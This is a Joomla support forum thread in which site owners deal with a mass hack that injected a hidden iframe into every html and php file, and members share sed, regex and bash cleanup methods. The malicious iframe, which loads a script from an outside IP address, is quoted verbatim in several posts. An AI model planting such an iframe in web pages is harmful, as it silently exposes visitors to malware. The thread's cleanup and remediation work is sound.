The Joomla! Forum ™

Download

Demo


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 16 posts ] 
  Print view Previous topic | Next topic 
Author Message
nutts4life
PostPosted: Wed Feb 04, 2009 10:23 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
Are these guys are so annoying.

So here's my site:
http://www.mymechani cs.co.uk/

Before you click on it! There is a worm embedded in an iframe on the site.

It occurs in two places, here:
Code:
<body>
<div class="topbar">
<div id="navcontainer">
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><ul id="mainlevel-nav"><li><a href="http://www.mymechanics.co.uk/" class="mainlevel-nav" id="active_menu-nav">Home</a></li><li><a href="http://www.mymechanics.co.uk/Garages/" class="mainlevel-nav" >Browse Garages</a></li><li><a href="http://www.mymechanics.co.uk/Car-Advice/home" class="mainlevel-nav" >Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,14/" class="mainlevel-nav" >Add Garage</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,28/" class="mainlevel-nav" >Add Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/Forum/home" class="mainlevel-nav" >Forum</a></li></ul><div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>


Note that it occurs just before my first modules is loaded (which is mod_mainmenu). Here is the section in my template index.php:

Code:
<body>
<div class="topbar">
<div id="navcontainer">
<?php mosLoadModules ( 'top',-1 ); ?>
<div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>


I have a couple of other modules loading.

Then it occurs immediately in my content pane:
Code:
<div class="right_banner"></div>
   
      <table class="contentpaneopen">
            <tr>
         <td valign="top" colspan="2">
            <div align="left"><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>      <div class="moduletable-si">
            <table class="siteinfo">


The div -si is another module called mod_siteinfo. Here is it in my index.php:

Code:
<div class="right_banner"><?php mosLoadModules('banner',-1);?></div>
<?php mosMainBody(); ?>
<?php if (mosCountModules('user1') || mosCountModules('user2')) { ?>


I've checked both the modules and there is no sign of it in here.

Where on earth is this code being put!? Could it be in the mosloadmodule call? where is that?

Sorry, any help would be great.

Thanks,

Olly


Last edited by nutts4life on Thu Feb 05, 2009 7:40 pm, edited 1 time in total.

Top
 Profile  
 
nutts4life
 Post subject: Re: Help ME!
PostPosted: Wed Feb 04, 2009 10:45 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
Ok,

I've found out what these monkeys have done.

Everysingle one of the index.html's have got this code in them.

As you all know there's about 100 - 150 of these.

And i have 5 sites, that all have the same problem.

I need some ideas on how i'm going to get rid of these iframes.

Any ideas?

Thanks,

Olly
Top
 Profile  
 
nutts4life
PostPosted: Thu Feb 05, 2009 7:43 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
OK, here's how i did it. I hope this is useful for someone one day.

The hacker had search and replaced ALL the php / html and htm files in my hosting area.

The had added the iframe html above.

So i logged into my hosting server using putty and ran the following commands from the root directory:
Code:
find -name "*.htm*" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

AND
Code:
find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;


This got rid of them.

Good luck and let's beat these guys.

n4l
Top
 Profile  
 
Tonie
PostPosted: Thu Feb 05, 2009 7:48 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Thu Aug 18, 2005 7:13 am
Posts: 16285
Have you also found the way they came into your site? If not, it's going to be child's play to do it again.

_________________
Joomla forum global moderator.

Take care
Top
 Profile  
 
nutts4life
PostPosted: Sat Feb 07, 2009 1:52 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
Toni,

Thanks for the concern, I did find the way. I was using an include one of my other sites and reading the parameters of the include from the URL!

How dumb was that. Anyway, i fixed it all. If it happens again.

I will contact here.

Thanks,

n4l
Top
 Profile  
 
rajeshatbuzz
PostPosted: Mon Jun 22, 2009 7:42 pm 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Wed Sep 24, 2008 6:06 pm
Posts: 191
Location: Bangalore
I just modify above script and used following...
find -name "*.htm*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.php*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.js*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.html*" -exec sed -i 's/<iframe src=//' {} \;

but no output..
Is the command line is correct?

_________________
cmsGalaxy Team, Web Developer, Bangalore, India
Website Design - Development - SEO - Joomla
www.cmsGalaxy.com
Top
 Profile  
 
mandville
PostPosted: Sun Oct 25, 2009 9:29 am 
User avatar
Joomla! Master
Joomla! Master
Online

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11629
Location: The Girly Side of Joomla in Sussex
cagsan wrote:
And change the chmod of the files that infected from 777 to 666.

no - delete the infected files and replace with poper clean files and then make sure your site is secure

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
ifanatic
PostPosted: Sun Dec 06, 2009 1:11 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Aug 24, 2009 11:23 am
Posts: 28
Hi guys,

I am in the same situation as above.

I don't have putty access to my host.
So now I have to restore files from recent backups.

My concern is although I know how to get rid of this iframe crap, I would like to know from you guys what directory permissions should I use after joomla installations.


Regards,
Top
 Profile  
 
mandville
PostPosted: Sun Dec 06, 2009 1:41 am 
User avatar
Joomla! Master
Joomla! Master
Online

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11629
Location: The Girly Side of Joomla in Sussex
ifanatic wrote:
Hi guys

My concern is although I know how to get rid of this iframe crap, I would like to know from you guys what directory permissions should I use after joomla installations.
Regards,

http://docs.joomla.org/Security_Checklist_7

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
WeWatch
PostPosted: Wed Dec 16, 2009 5:53 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed May 06, 2009 10:38 am
Posts: 49
If you have your entire website downloaded on your PC (backup) you could use grepWin.

If you find the string that needs to be removed you can create a regex string to find and remove all of them.

Place a \ in front of all special characters: ( ) { } / as this uses grep's regex which is different from others.

So the line found in the first website:

Code:
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Would be found with:

Code:
<iframe src\s*=\s*['|"]http:\/\/.*width\s*=\s*0 height\s*=\s*0 style\s*=\s*['|"]hidden['|"] frameborder\s*=\s*0 marginheight\s*=\s*0 marginwidth\s*=\s*0 scrolling\s*=\s*no><\/iframe>


The "\s*" before and after each "=" means that there might be a space or tab before and after the "=". You need to account for that. the ['|"] is a character class that will match either a single quote or double quote - you need to account for that as well.

The regex I show above will catch any iframe with those parameters regardless of whether or not the iframe uses an IP address or any domain - so be carefule with it. The section: http:\/\/.* means: http:// all characters up to width. The dot is all characters and the * is zero or many times.

When using grepWin, I usually tell it to search first, then I'll go ahead and let it do a search and replace. Replace with a blank will remove it all.

If you have problems using grepWin let me know and I'll help you create a string.
Top
 Profile  
 
rajeshatbuzz
PostPosted: Wed Feb 17, 2010 11:39 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Wed Sep 24, 2008 6:06 pm
Posts: 191
Location: Bangalore
Dream weaver this tool which is best for this. You can remove IFRAME code from all the files in click using dreamweaver.

_________________
cmsGalaxy Team, Web Developer, Bangalore, India
Website Design - Development - SEO - Joomla
www.cmsGalaxy.com
Top
 Profile  
 
mandville
PostPosted: Wed Feb 17, 2010 10:43 pm 
User avatar
Joomla! Master
Joomla! Master
Online

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11629
Location: The Girly Side of Joomla in Sussex
dreamweaver may be the tool for you, but how did the code get there in the first place?

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
vjorchid
PostPosted: Thu Apr 29, 2010 12:23 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Jan 22, 2010 6:30 pm
Posts: 3
rajeshatbuzz wrote:
Dream weaver this tool which is best for this. You can remove IFRAME code from all the files in click using dreamweaver.


Please can you explain a little more how i could delete my iframe from dreamweaver?

any script or tool to clen those fu... iframes?

i can belive in this day and i cant find an antivirus to clean my site from my ftp?
can your suggest any tool to clean my site online?

repeat i cant download all the file again..and upload..all soo many files... :(
Top
 Profile  
 
WeWatch
PostPosted: Thu Apr 29, 2010 12:40 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed May 06, 2009 10:38 am
Posts: 49
You'll have to download all the files to your local PC. Otherwise, you won't have the tools to do what you want to do.

Then I'd suggest using grepWin.
Top
 Profile  
 
vjorchid
PostPosted: Thu May 06, 2010 2:34 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Jan 22, 2010 6:30 pm
Posts: 3
i cant download all the files in my pc...

any chance to delete iframes using php my admin? how?

thanks :D
please i need a solution online :(
Top
 Profile  
 
jaspujari
PostPosted: Mon Dec 10, 2012 1:40 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Dec 10, 2012 1:16 pm
Posts: 2
You can modify and run the following script in the root dir of your Joomla site.
It will clean all the files with the iframe infection, typically with one line appended to all .js files.
Feel free to replace the search string with a different regexp that handles your infection.
This will cycle thryu every file and replace the searched string with a space.
=================
#!/bin/bash
for fl in $(grep -rl 'document.write..<iframe src="http://.*<.iframe>..' .); do
sed -i 's/document.write(.<iframe src="http:\/\/.*<\/iframe>.)/ /g' $fl
echo "Fixed " $fl
done
=================
take care of permissions after the cleanup to stop future infections.

cheers
J
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 16 posts ] 


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Who is online

Users browsing this forum: No registered users and 6 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group